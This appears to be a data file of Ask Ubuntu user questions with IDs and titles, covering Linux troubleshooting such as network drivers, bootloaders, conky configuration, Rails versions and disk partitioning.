169449	question on reported processor speed in system settings > details	i have a gigabyte motherboard and cpu i inherited from my son when he bought a new gaming machine . i changed the bios from 8x to 6x multiplier as i do n't need the speed and i 'd rather it ran cooler and maybe more reliably . however , in system settings > details i do n't think the reported speed changed . it is now saying intel® core™2 quad cpu q9550 @ 2.83ghz × 4 my question is about how it determines the 2.83ghz , and could it be fooled by the manipulations of the bios ? edit : more info . the multiplier i referred to ( and i probably used the wrong word ) is the cpu clock ratio . changing it to 6x , changes the cpu clock ( as reported by the bios ) to 2.00ghz ( 333mhz x6 ) . it seems to me that the cpu temperatures are cooler now , since i changed it , so i think it is running slower - but still it is reported as 2.83ghz in ubuntu edit : even more info output from lshw -c cpu ... *-cpu:0 description : cpu product : intel ( r ) core ( tm ) 2 quad cpu q9550 @ 2.83ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : 6.7.10 serial : 0001-067a-0000-0000-0000-0000 slot : socket 775 size : 2ghz capacity : 4ghz width : 64 bits clock : 333mhz capabilities : boot fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx x86-64 constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority cpufreq configuration : id=1 *-logicalcpu:0 description : logical cpu physical id : 1.1 width : 64 bits capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 1.2 width : 64 bits capabilities : logical *-logicalcpu:2 description : logical cpu physical id : 1.3 width : 64 bits capabilities : logical *-logicalcpu:3 description : logical cpu physical id : 1.4 width : 64 bits capabilities : logical *-cpu:1 physical id : 1 bus info : cpu @ 1 version : 6.7.10 serial : 0001-067a-0000-0000-0000-0000 size : 2ghz capacity : 2ghz capabilities : vmx ht cpufreq configuration : id=1 *-logicalcpu:0 description : logical cpu physical id : 1.1 capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 1.2 capabilities : logical *-logicalcpu:2 description : logical cpu physical id : 1.3 capabilities : logical *-logicalcpu:3 description : logical cpu physical id : 1.4 capabilities : logical *-cpu:2 physical id : 2 bus info : cpu @ 2 version : 6.7.10 serial : 0001-067a-0000-0000-0000-0000 size : 2ghz capacity : 2ghz capabilities : vmx ht cpufreq configuration : id=1 *-logicalcpu:0 description : logical cpu physical id : 1.1 capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 1.2 capabilities : logical *-logicalcpu:2 description : logical cpu physical id : 1.3 capabilities : logical *-logicalcpu:3 description : logical cpu physical id : 1.4 capabilities : logical *-cpu:3 physical id : 3 bus info : cpu @ 3 version : 6.7.10 serial : 0001-067a-0000-0000-0000-0000 size : 2ghz capacity : 2ghz capabilities : vmx ht cpufreq configuration : id=1 *-logicalcpu:0 description : logical cpu physical id : 1.1 capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 1.2 capabilities : logical *-logicalcpu:2 description : logical cpu physical id : 1.3 capabilities : logical *-logicalcpu:3 description : logical cpu physical id : 1.4 capabilities : logical
169451	my ubuntu theme gnome shell is broken ?	hello fellow ubuntu users , i 've ran in to a problem . i 'm sorry if i 'm not using the right therms , but it seems that the shell of my ubuntu is broken , i 've lost the 3 graphic ways of ( windows-buttons ) resizing and minimize my windows : http : //i.stack.imgur.com/azzqb.png ( sorry i ca n't post images since spam protections says that i 'm a noob ) the problem is that i cant minimize m empathy chat windows , and the same goes for my skype . i have to alt+f4 them to close the windows , but sometimes i just want to minimize them.. please help me out ? i did try to change shell and back to gnome , but it did not help really : (
169455	kubuntu 12.04 keyboard + mouse do not respond	i just installed kubuntu 12.04 amd-64 . when i login the mouse , moves but the clicks appear to be random ( some are accepted and some are not ) and the same happens with the keystrokes . this makes the system utterly unusable . the strange things is that i 'm writing this from the live usb from which i installed the system and both work just fine . i should mention i had issues getting the system to boot-up after installation due to my board 's uefi . i got around that by starting the live usb in not-uefi mode . edit : i gave up and installed ubuntu 12.04 .
169456	how does personal file sharing work ?	i 'm currently using samba to share files between my ubuntu pc and my mac . however , i notice that there is a 'personal file sharing ' preference panel built into ubuntu . is it possible to view my ubuntu public folder from my mac using just what comes pre-installed on ubuntu , since every guide/tutorial/post i 've found so far just tells me to use samba ?
169457	realtek rtl8111/8168b pci express gigabit rev03 - keep losing driver/no link -wired	i 'm using mint 10 with 2.6.35-32-generic the pc has two wired ethernet cards . they 're both the same . one is built into the motherboard , the other is a pci-e card . i 'm using the built in one , but neither are working anymore . the only change i 've recently made to my system until my ethernet stopped working was to install mint kde 12.04 64bit as a dual boot . the strange thing is , that the built in ethernet card works fine in that every time . that kernel is a 3.2 one . so all of a sudden , ifconfig tells me that there 's no eth0 showing . dmesg | grep r816 gives me nothing . i 've checked out just about every launchpad/ask ubuntu/ubuntu forum link i can find and the best results i get are from here : the pain of an realtek ( rtl8111/rtl8168 ) ethernet card i 've even tried the $ ( uname -r ) option & the blacklist of the r8169 was already there from a couple of years ago , when i had a similar issue on this machine . build-essentials is installed . attached is a copy of my terminal commands for my latest attempt to get this working . i have no other way to connect to the internet on this machine so i had to copy and paste this into a new text file and transfer it to my laptop via usb . root @ desktopblack : ~ $ cd r8168-8.031.00/ root @ desktopblack : ~/r8168-8.031.00 $ make clean modules make -c src/ clean make [ 1 ] : entering directory `/home/badcam/r8168-8.031.00/src' make -c /lib/modules/2.6.35-32-generic/build subdirs=/home/badcam/r8168-8.031.00/src clean make [ 2 ] : entering directory `/usr/src/linux-headers-2.6.35-32-generic' clean /home/badcam/r8168-8.031.00/src/.tmp_versions clean /home/badcam/r8168-8.031.00/src/module.symvers /home/badcam/r8168-8.031.00/src/modules.order make [ 2 ] : leaving directory `/usr/src/linux-headers-2.6.35-32-generic' make [ 1 ] : leaving directory `/home/badcam/r8168-8.031.00/src' make -c src/ modules make [ 1 ] : entering directory `/home/badcam/r8168-8.031.00/src' make -c /lib/modules/2.6.35-32-generic/build subdirs=/home/badcam/r8168-8.031.00/src modules make [ 2 ] : entering directory `/usr/src/linux-headers-2.6.35-32-generic' cc [ m ] /home/badcam/r8168-8.031.00/src/r8168_n.o cc [ m ] /home/badcam/r8168-8.031.00/src/r8168_asf.o cc [ m ] /home/badcam/r8168-8.031.00/src/rtl_eeprom.o cc [ m ] /home/badcam/r8168-8.031.00/src/rtltool.o ld [ m ] /home/badcam/r8168-8.031.00/src/r8168.o building modules , stage 2 . modpost 1 modules cc /home/badcam/r8168-8.031.00/src/r8168.mod.o ld [ m ] /home/badcam/r8168-8.031.00/src/r8168.ko make [ 2 ] : leaving directory `/usr/src/linux-headers-2.6.35-32-generic' make [ 1 ] : leaving directory `/home/badcam/r8168-8.031.00/src' root @ desktopblack : ~/r8168-8.031.00 $ make install make -c src/ install make [ 1 ] : entering directory `/home/badcam/r8168-8.031.00/src' make -c /lib/modules/2.6.35-32-generic/build subdirs=/home/badcam/r8168-8.031.00/src install_mod_dir=kernel/drivers/net modules_install make [ 2 ] : entering directory `/usr/src/linux-headers-2.6.35-32-generic' install /home/badcam/r8168-8.031.00/src/r8168.ko depmod 2.6.35-32-generic make [ 2 ] : leaving directory `/usr/src/linux-headers-2.6.35-32-generic' make [ 1 ] : leaving directory `/home/badcam/r8168-8.031.00/src' root @ desktopblack : ~/r8168-8.031.00 $ insmod ./src/r8168.ko root @ desktopblack : ~/r8168-8.031.00 $ mkinitramfs -o /boot/initrd.img- $ ( uname -r ) $ ( uname -r ) warning : no support for locale : en_nz.utf8 root @ desktopblack : ~/r8168-8.031.00 $ lspci -v 00:00.0 host bridge : advanced micro devices [ amd ] rs780 host bridge alternate subsystem : advanced micro devices [ amd ] rs780 host bridge alternate flags : bus master , 66mhz , medium devsel , latency 32 memory at < ignored > ( 64-bit , non-prefetchable ) capabilities : [ c4 ] hypertransport : slave or primary interface capabilities : [ 54 ] hypertransport : unitid clumping capabilities : [ 40 ] hypertransport : retry mode capabilities : [ 9c ] hypertransport : # 1a capabilities : [ f8 ] hypertransport : # 1c 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) subsystem : giga-byte technology ga-ep45-ds5 motherboard flags : bus master , fast devsel , latency 0 , irq 45 i/o ports at ce00 [ size=256 ] memory at fdfff000 ( 64-bit , prefetchable ) [ size=4k ] memory at fdff8000 ( 64-bit , prefetchable ) [ size=16k ] [ virtual ] expansion rom at fdf00000 [ disabled ] [ size=128k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 01 capabilities : [ ac ] msi-x : enable- count=4 masked- capabilities : [ cc ] vital product data capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 03-00-00-00-68-4c-e0-00 kernel driver in use : r8168 kernel modules : r8169 root @ desktopblack : ~/r8168-8.031.00 $ lsmod | grep r816 r8168 237114 0 root @ desktopblack : ~/r8168-8.031.00 $ sudo ethtool eth0 settings for eth0 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : twisted pair phyad : 0 transceiver : internal auto-negotiation : on mdi-x : unknown supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) link detected : yes root @ desktopblack : ~/r8168-8.031.00 $ dmesg | grep r816 [ 1527.700515 ] r8168 gigabit ethernet driver 8.031.00-napi loaded [ 1527.700568 ] r8168 0000:03:00.0 : pci int a - > gsi 18 ( level , low ) - > irq 18 [ 1527.700597 ] r8168 0000:03:00.0 : setting latency timer to 64 [ 1527.700731 ] r8168 0000:03:00.0 : irq 45 for msi/msi-x [ 1527.769143 ] r8168 : this product is covered by one or more of the following patents : us5,307,459 , us5,434,872 , us5,732,094 , us6,570,884 , us6,115,776 , and us6,327,625 . [ 1527.769148 ] r8168 copyright ( c ) 2012 realtek nic software team < nicfae @ realtek.com > root @ desktopblack : ~/r8168-8.031.00 $ sudo ifconfig eth0 up root @ desktopblack : ~/r8168-8.031.00 $ sudo ifconfig -a eth0 link encap : ethernet hwaddr 1c:6f:65:21:68:98 inet6 addr : fe80 : :1e6f:65ff : fe21:6898/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:240 ( 240.0 b ) tx bytes:3213 ( 3.2 kb ) interrupt:45 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:38307 errors:0 dropped:0 overruns:0 frame:0 tx packets:38307 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1111719 ( 1.1 mb ) tx bytes:1111719 ( 1.1 mb ) tap0 link encap : ethernet hwaddr de : ba : fd:35 : c8 : bf inet addr:10.0.1.1 bcast:10.255.255.255 mask:255.0.0.0 inet6 addr : fe80 : :dcba : fdff : fe35 : c8bf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:35 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) vboxnet0 link encap : ethernet hwaddr 0a:00:27:00:00:00 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) root @ desktopblack : ~/r8168-8.031.00 $ nano /etc/network/interfaces auto lo iface lo inet loopback # auto eth0 # iface eth0 inet dhcp iface eth0 inet static address 192.168.1.2 netmask 255.255.255.0 pre-up /usr/sbin/ethtools -s eth0 speed 1000 autoneg off gateway 192.168.1.1 network 192.168.1.0 broadcast 192.168.1.255 # auto eth1 # iface eth1 inet dhcp # iface eth1 inet static # address 192.168.1.10 # netmask 255.255.255.0 # gateway 192.168.1.1 # network 192.168.1.0 # broadcast 192.168.1.255 # sudo ifdown eth0 # sudo ifup eth0 # sudo ifdown eth1 # sudo ifup eth1 so , everything ( to me ) looks as if it should be working . but , it 's not . as soon as i restart ( i 've tried the power off completely method many times as well ) i lose everything , and am back to square one . i 'm stuck . could the two cards be conflicting with each other ? i might try removing one while i wait for an answer here . why would kubuntu kde 12.04 work ( the kernel i assume ) and not my old trusted mint 10 anymore ? is one possible solution to upgrade the kernel ? or , is that a really bad thing to do ? can i reverse that if needed ? i found this post and this command actually gets my eth0 working . then i tried sudo service network-manager stop followed by sudo dhclient3 eth0 but , with a restart , i lose everything again . i note that even with sudo dhclient3 eth0 my gnome panel network manager still shows no ethernet connection , and a left-click displays network manager is not running so , that led me to this launchpad bug report and the solution described in there gets the network manager applet working correctly . service network-manager stop rm /var/lib/networkmanager/networkmanager.state service network-manager start i also added to networkmanager.state [ main ] : networkingenabled=true this means that as soon as i reinstall the driver , the ethernet is back up and running , but i still lose the driver on restart . so now , i 'm guessing that all i need now is for my ethernet driver to not disappear upon restart .
169459	set eclipse as the default program for opening a file on ubuntu	i 'd like to set eclipse as the default text editor on ubuntu . however , when choosing the default program for opening .html files , i notice that eclipse is not visible as one of the programs that can open this type of file . how can i set eclipse as the default editor for .html files ( and other file types as well ? )
169461	how do i change my cursor manually ?	i have the cursor theme that i want , but how do i install it ? do i have to move it to a folder , then go to ubuntu tweak or myunity for example and choose it from there ? thanks
169464	incorrect username/password prompt on ubuntu 12.04 live usb	i 'm having a little bit of trouble with ubuntu12.04 on a live usb . yesterday when installing mplayer 2 the system downloaded and installed an update into my live usb , after the update , mplayer2 opened and the system just froze , after about 10 minutes being frozen , i decided to make a hard reset ( pressing the power button down ) , and after that the live usb just started to throw out i/o errors when booting into the live session . after 3 tries , the system booted normally but instead of taking me directly to the workspace , it showed a login prompt , just to clarify i have never made an account on the live usb , i just booted ; i already tried typing `` ubuntu '' as username and a blank password , but when i press enter the system just shows a black screen and some words ( completely illegible , it just shows for half a second ) and returns to the login screen , and everything else ( like root and blank pwd ) just gives me a `` incorrect username/pwd '' message . i really need help with this , as i had some sensitive documents in my persistent live session and ca n't afford to lose it ( i do n't have a backup , just yesterday those documents were finished and i do n't have a hdd because it died and i 'm using the live usb as a contingency plan until the new one arrives ) .
169466	compizconfig settings manager `` enhanced zoom desktop '' feature does n't work with cinnamon 1.4 in ubuntu 12.04lts	i 'm using ubuntu 12.04 lts 64 bit with cinnamon 1.4 and i want a full screen magnifier for video presentations , something that i can zoom in and out during the recording . ( i use a cinnamon applet for recording the screen . ) the magnifier that comes with accessibility applet of cinnamon is not very good . i used to use enhanced zoom desktop feature in older versions of ubuntu . so i installed compizconfig settings manager and enabled the feature but nothing happens when i try the combination i set . is there a way to get it working ? or do you know any other magnifier application ?
169467	is there an api for accessing historical ubuntu security notices ?	i 'm working on an automated security audit system which analyses custom ubuntu installations to check for packages affected by security vulnerabilities . since these machines are not connected to the internet i can not simple run apt-get , and we need to keep the upgrades as small as possible so only updating packages when they are actually needed . part of this process is to monitor the ubuntu security notices ( usn ) for new reports and extract information . however , i ca n't find a way to easily access all of the historical usn notices . there is an rss feed linked on http : //www.ubuntu.com/usn/ but it only returns the most recent 50 reports , which wo n't work as i 'm dealing with older ubuntu versions and need to check historical reports . the two options i can see , neither of which are nice , are to scrape the email archives or scrape the website . but i 'd rather avoid doing these if possible ... any ideas ?
169468	how do i set image position in conky	i copied and modified an existing .conkyrc file from the ubuntu forum and i 'm trying to place the linuxmint logo in a specific position below are my conkyrc file and the screenshot # ubuntu-conky # a comprehensive conky script , configured for use on # ubuntu / debian gnome , without the need for any external scripts . # # based on conky-jc and the default .conkyrc . # includes : # - tail of /var/log/messages # - netstat shows number of connections from your computer and application/pid making it . kill spyware ! # # -- pengo # # create own window instead of using desktop ( required in nautilus ) own_window yes own_window_type desktop own_window_transparent yes own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager # use double buffering ( reduces flicker , may not work for everyone ) double_buffer yes # fiddle with window use_spacer right # use xft ? use_xft yes xftfont urw gothic : size=8 xftalpha 0.8 text_buffer_size 2048 # update interval in seconds update_interval 3.0 # minimum size of text area # minimum_size 250 5 # draw shades ? draw_shades no # text stuff draw_outline no # amplifies text if yes draw_borders no uppercase no # set to yes if you want all text to be in uppercase # stippled borders ? stippled_borders 3 # border margins border_margin 9 # border width border_width 10 # default colors and also border colors , grey90 == # e5e5e5 default_color grey own_window_colour brown own_window_transparent yes # text alignment , other possible values are commented # alignment top_left # alignment top_right # alignment bottom_left # alignment bottom_right . alignment top_middle # gap between borders of screen and text gap_x 10 gap_y 10 # display temp in fahrenheit temperature_unit fahrenheit # choose which screen on which to display # stuff after 'text ' will be formatted on screen text $ color $ { color green } system $ { hr 2 } $ color $ nodename $ sysname $ kernel on $ machine linuxmint 11 `` katya '' ( oneric ) $ { image ~/conky/logo_linux_mint.png -s 80x60 -f 86400 } $ { color green } cpu $ { hr 2 } $ color $ { freq } mhz load : $ { loadavg } temp : $ { hwmon temp 1 } $ cpubar $ { cpugraph 000000 ffffff } name pid cpu % mem % $ { top name 1 } $ { top pid 1 } $ { top cpu 1 } $ { top mem 1 } $ { top name 2 } $ { top pid 2 } $ { top cpu 2 } $ { top mem 2 } $ { top name 3 } $ { top pid 3 } $ { top cpu 3 } $ { top mem 3 } $ { top name 4 } $ { top pid 4 } $ { top cpu 4 } $ { top mem 4 } $ { color green } memory / disk $ { hr 2 } $ color ram : $ memperc % $ { membar 6 } $ color swap : $ swapperc % $ { swapbar 6 } $ color root : $ { fs_free_perc / } % $ { fs_bar 6 / } $ color hda1 : $ { fs_free_perc /media/sda1 } % $ { fs_bar 6 /media/sda1 } $ color $ { color green } network ( $ { addr eth1 } ) $ { hr 2 } $ color down : $ color $ { downspeed eth1 } k/s $ { alignr } up : $ { upspeed eth1 } k/s $ { downspeedgraph eth1 25,140 000000 ff0000 } $ { alignr } $ { upspeedgraph eth1 25,140 000000 00ff00 } $ color total : $ { totaldown eth1 } $ { alignr } total : $ { totalup eth1 } $ { execi 30 netstat -ept | grep estab | awk ' { print $ 9 } ' | cut -d : -f1 | sort | uniq -c | sort -nr } $ { color green } logging $ { hr 2 } $ color $ { execi 30 tail -n3 /var/log/messages | awk ' { print `` `` , $ 5 , $ 6 , $ 7 , $ 8 , $ 9 , $ 10 } ' | fold -w50 } $ { color green } fortune $ { hr 2 } $ color $ { execi 120 fortune -s | fold -w50 } i want to put the mint logo right after the word ( oneric ) . any help would be greatly appreciated .
169470	how to prevent skype from upgrading and keep the old version for reinstallation ?	today , as i 've issued the apt-get upgrade command , i 've noticed there is skype update in the list . i am absolutely happy with the old skype 2.2.0.35 beta and definitely do n't want anything to change . what i want is not only to forbid the package to update but to save it for future installations too . how can i achieve this ?
169471	how permanent can a wubi install be ?	just installed ubuntu 12.04 via wubi to my lenovo ideapad laptop . i originally wanted to dual boot with my windows7 , but the windows7/lenovo combination is configured to take up 4 primary partitions , and my hard drive is a bit to small for a logical partition install . so i thought i would do a wubi install before getting a larger hard drive to accommodate a larger install on logical partitions . question : my wubi install is working out really nicely in fact . everything is fast and dandy , and it out performs the windows os already there . so , is it worth migrating to a permanent install if wubi is as nice as this ? or will there be problems down the road ?
169473	sharing connection to other pcs ( via wired ethernet )	i have two desktop pcs i use frequently , both running ubuntu 12.04 . one is connected to the internet via wireless , and the other has no wireless card . is there any way i can share my internet connection across the ethernet ports ?
169477	how to create a vnc server such that each user can have access using its own user/password combination	i would like to know which software of what is the procedure to create a vnc server such that each user can have access using its own user/password combination ?
169481	i try to install a .deb , when i double click i get : the file `` filename '' could not be opened	i also try to use the command prompt on the desktop directory , but it states permission denied . who is denying permission ? i am the only user on my computer .
169482	how do i automatically enable desktop sharing on startup	desktop sharing works just fine when a user is logged in , but i am using ubuntu 12.04 as a media server and i want desktop sharing launched automatically . is there a way to do this without automatically logging into the desktop ? much thanks !
169484	ubuntu 12.04 bootloader failed to install	sorry about the excessively long question , but i figured giving more information would be better . i recently bought a new desktop for myself , running windows 7 . it has two hard drives , and i wanted to install ubuntu on a small partition on the second hard drive . i created 25gb `` free space '' in windows and ran a livecd install . i wanted to select the install options myself but accidentally selected `` install alongside windows 7 , '' but it seemed to pick up the free space and installed itself there as i wanted it to . however , i was told that the bootloader installation had failed . i chose to `` cancel installation , '' leaving my computer unable to boot . i wiped my computer and reinstalled windows . after that , i tried installing ubuntu through windows using wubi , once using files from my livecd and once downloading everything again . both times the install succeeded , but both times when i restarted and tried to load ubuntu , it gave me an error - wubildr.mbr was corrupt or missing . i checked in windows - it was indeed present on the c : \ drive . i went back to the livecd installation , this time going the custom options route . i assigned 16gb to an ext4 journaling file system and 10gb to a swap file . i got the same bootloader error as before . being prompted to select a different partition to install the bootloader to , i first tried the partition ubuntu was installed on . a window came up saying that the install had succeeded , but a second window gave me the same error and choices as before . i went through every single option it gave me , including the windows partition and the hard drives themselves ( dev/sda , dev/sdb ) . same result . i then chose to not install a bootloader . windows still works fine , and i assume ubuntu has installed but is unbootable . knowing that my computer could potentially brick itself again - and , this time around , with a lot of data to lose and hassle to go through if i mess it up - i really do n't want to do anything without some advice . so i 'll ask this : why did the bootloader fail to install ? can i fix the error and install ubuntu fresh ? is there any way to get around the error , install the bootloader , and point it towards an existing installation of ubuntu ? is there a quicker and easier solution i might have missed ? edit : thanks for the tip , athlox . after testing the livecd in virtualbox with no installation problems , i looked around for some alternate bootloaders but had no success . i attempted another install , which installed the bootloader and ubuntu just fine but bricked windows 7 . i wiped both hard disks clean , including some `` system reserved '' partitions i had n't noticed before , before re-installing windows 7 on one hard drive and immediately afterwards installing ubuntu on the other . now the computer boots into windows , but i can pop into the bios at startup to boot into ubuntu via it 's bootloader , and i 'm guessing it 'll only take a bit of poking at the bios to swap the load order .
169485	is 12.04 more stable than 11.10 ?	i 've just installed a ubuntu ( studio ) 12.04 on my laptop . there are a few problems . packages are broken , i have failed to open directory`errors , and there are also some problems with ubuntu 12.04 lts . before i installed ubuntu studio , i wanted to install the standard ubuntu 12.04 just to test it out . then i installed , it went into non-graphical mode and failed to install the kernel at the end of the installation . are there any defects with my ubuntu 12.04 installation/installation media ? i asked in a forum , and some user said that 11.10 is actually more stable than 12.04 . now i read some posts here that 12.04 is just stable , even someone says that 12.04 is the best version . is that right ? if the original ubuntu 12.04 wo n't even install on my system correctly , does that mean ubuntu studio wo n't either ?
169487	no space left on device while i still have 640gb of free space	i was copying some huge files from a remote disk to my computer and got a message no space left on device i installed my ubuntu 12.04 in my 640gb hdd and thought that ubuntu was utilizing all of its space but it seems not from this error message . i checked the space with 'disk usage analyzer ' and the result says total filesystem capacity : 658.2 gb ( used : 28.9gb available : 629.2gb ) i checked again with 'disk utility ' . and i found out that only 19gb is spared for the root and the rest is mounted at some place called /host . i installed ubuntu in 640gb and hoped it would utilize the full disk space , but it looks like it some how occupied only about 20 gb of the 640gb hdd and left the rest of the space mounted at /host . how can i resolve this problem ? could anybody give me a solution ?
169495	what are `` /run/lock '' and `` /run/shm '' used for ?	i just want to know where and how /run/lock and /run/shm can help our pc . $ df -h filesystem size used avail use % mounted on /dev/sda1 56g 13g 41g 24 % / udev 983m 4.0k 983m 1 % /dev tmpfs 396m 840k 395m 1 % /run none 5.0m 8.0k 5.0m 1 % /run/lock none 990m 164k 990m 0 % /run/shm
169513	how do i get these virtual domains working in tomcat ?	im new to ubuntu and tomcat moving away from windows and iis to create a website on aws . im having problems trying to replicate what had running on my windows machine . i hope someone can clarify the following . i 've setup the following virtual domain ; dev.sitename.com devimages.sitename.com in my tomecat/conf/server.xml file i 've setup the following one for each of the above virtual domains ; < host name= '' dev.sitename.com '' unpackwars= '' true '' autodeploy= '' true '' > < context path= '' '' docbase= '' /home/webapps/workspace/www_sitename_com/webcontent '' debug= '' 0 '' reloadable= '' true '' / > < /host > problem i getting is that i cant seem to have both domain running simutiously as i did when running on iis7 . i dont understand why i can only run one instance of tomcat . also if im viewing on of the above url 's and i want to visit stackoverflow.com it stops the tomcat server . i dont understand why this is happening and how i can go about resolving this .
169514	why does ubuntu think rails 2.3.14 is installed even though i installed 3.2 ?	i am pretty new to ubuntu , ruby , and rails . i am working my way through the first rails guide . midway through that guide , i upgraded ubuntu version 11 to ubuntu version 12 . while i was on version 11 , i installed rails via : gem install rails and then ran : rails -- version which i 'm almost sure output something along the lines of : rails 3.2.7 when i ran : rails server the webrick server started , and i was able to view my getting started page . i was also able to continue with the tutorial a little ways . then , i ran into some trouble with some missing/broken packages , and upgraded ubuntu to version 12 in the process of trying to fix that issue . once i logged into ubuntu version 12 , i tried to continue with the tutorial . this time when i ran rails server this happened : create create app/controllers create app/helpers create app/models create app/views/layouts create config/environments create config/initializers create config/locales create db create doc create lib create lib/tasks create log create public/images create public/javascripts create public/stylesheets create script/performance create test/fixtures create test/functional create test/integration create test/performance create test/unit create vendor create vendor/plugins create tmp/sessions create tmp/sockets create tmp/cache create tmp/pids create rakefile create readme create app/controllers/application_controller.rb create app/helpers/application_helper.rb create config/database.yml create config/routes.rb create config/locales/en.yml create db/seeds.rb create config/initializers/backtrace_silencers.rb create config/initializers/inflections.rb create config/initializers/mime_types.rb create config/initializers/new_rails_defaults.rb create config/initializers/session_store.rb create config/initializers/cookie_verification_secret.rb create config/environment.rb create config/boot.rb create config/environments/production.rb create config/environments/development.rb create config/environments/test.rb create script/about create script/console create script/dbconsole create script/destroy create script/generate create script/runner create script/server create script/plugin create script/performance/benchmarker create script/performance/profiler create test/test_helper.rb create test/performance/browsing_test.rb create public/404.html create public/422.html create public/500.html create public/index.html create public/favicon.ico create public/robots.txt create public/images/rails.png create public/javascripts/prototype.js create public/javascripts/effects.js create public/javascripts/dragdrop.js create public/javascripts/controls.js create public/javascripts/application.js create doc/readme_for_app create log/server.log create log/production.log create log/development.log create log/test.log create vendor/rails i tried researching what was happening , and it looked like a result of rails being an older version . i ran this : rails -- version ..and got this : rails 2.3.14 i thought that maybe , somehow rails got downgraded or something , so i ran this : gem install rails and got this : successfully installed rails-3.2.7 1 gem installed installing ri documentation for rails-3.2.7 ... installing rdoc documentation for rails-3.2.7 ... i figured that it must be fixed , so i tried things that rails 3 should be able to do again , and got the same result as before , so i ran this : rails -- version and got this : rails 2.3.14 i ran through everything a few more times , and kept getting the same results . i 've tried researching why this could be happening , and so far , i 'm not coming up with anything . it looks like i can install rails 3 , but it does n't change that ubuntu 12 thinks that rails 2 is installed . it also reacts as if rails 2 is installed , and nothing seems to change that . why would ubuntu think that rails 2 was installed , if it 's telling me that rails 3 was just installed ? some additional details : i 'm using zsh terminal . i 'm using sudo where i need to , even if i did n't write it here i 'm running ubuntu in vmware workstation 8 i 'm running vmware workstation 8 in windows 7 i tried installing ubuntu 12 in a brand new virtual machine , and i 'm getting the same issue there .
169516	access files on samsung galaxy s3 external sd card ?	i have a samsung galaxy s3 running the stock samsung rom and i 'm trying to transfer files - videos , photos , music and downloads , from my handset to my system via usb running ubuntu 12.04 . i have followed to links suggested how to connect samsung galaxy s3 via usb ? but it all goes over my head . can anyone help me with a simple gui program or a link so i can simply copy and paste selected files from my phone onto my system ?
169521	ubuntu software center crashed	hi i try to open my ubuntu software center.. but it always crashed . then i try to update my ubuntu and this is what come out from the terminal : e : malformed line 57 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . please help .
169523	get client system information in ltsp	i 'm trying to get the system information of clients booted via ltsp to a ubuntu 10.04 server . any time i try any system info commands ( example lspci | grep vga ) it returns back the server information , not the client . is there a way to see the client information in ltsp ? local apps perhaps ? any help is appreciated .
169525	how to reinstall and completely wipe out windows and the old install of ubuntu ?	i installed ubuntu and it kept windows but i lost things in both , so i downloaded ubuntu again through different means and the install is going slow but it 's doing better than the first install . i want to know if i can get rid of windows and the old install of ubuntu during this installation , so all i have on my computer is the new ubuntu installation that is currently running ?
169530	`` this computer currently has no detected operating systems '' when installing	i am new to ubuntu ( amd64 ) and am attempting to install it on my laptop which already has windows 7 home premium x64 . i currently have two partitions on my hdd and i was planning on repartitioning my secondary partition to make room for a third to use for ubuntu . however when i attempt to install i get the following message : '' this computer currently has no detected operating systems '' choosing `` something else '' takes me to the partitions . however , it only detects a single unpartitioned space ( my entire hdd ) even though i actually have 2 partitions taking up plenty of space . by no means can i detect my two partitions using any method . is it possible the 32 bit installation might be more successful ? ( i doubt it but i had to ask ) unfortunately i ca n't post images directly since i am a new user but i can link them if anyone wants to see them for more clear information : edit : 250gb . i have two partitions for windows ( one main and another for storage ) as well as an empty third partition with 20gb that i intend to use for ubuntu . none are detected , however . edit : ok so i have fixparts , but i am unaware what exactly to do with it ( despite the readme ) due to my complete unfamiliarity with linux . can you give me details about what you did to fix your own drive ? final edit : sorry i lost my internet connection for awhile so i have n't been able to post . i finally fixed the problem . when i ran sudo fdisk -l it gave me several partitions in the list , so i tried running fixparts on individual partitions , which ended up being inconclusive ( and confusing ) then i decided to try to run fixparts over the entire unpartitioned space sudo fixparts /dev/sda as opposed to sudo fixparts /dev/sda1 sudo fixparts /dev/sda2 ( individual partitions ) and so on . after simply running the command on the entire hdd , it quickly finished and alas it was fixed ! going back to the installation , it detected my windows 7 installation , and also detected all existing partitions in the custom install mode . furthermore , my data on my other partitions was left completely unscathed . it fixed my problem at no cost . thanks for the help !
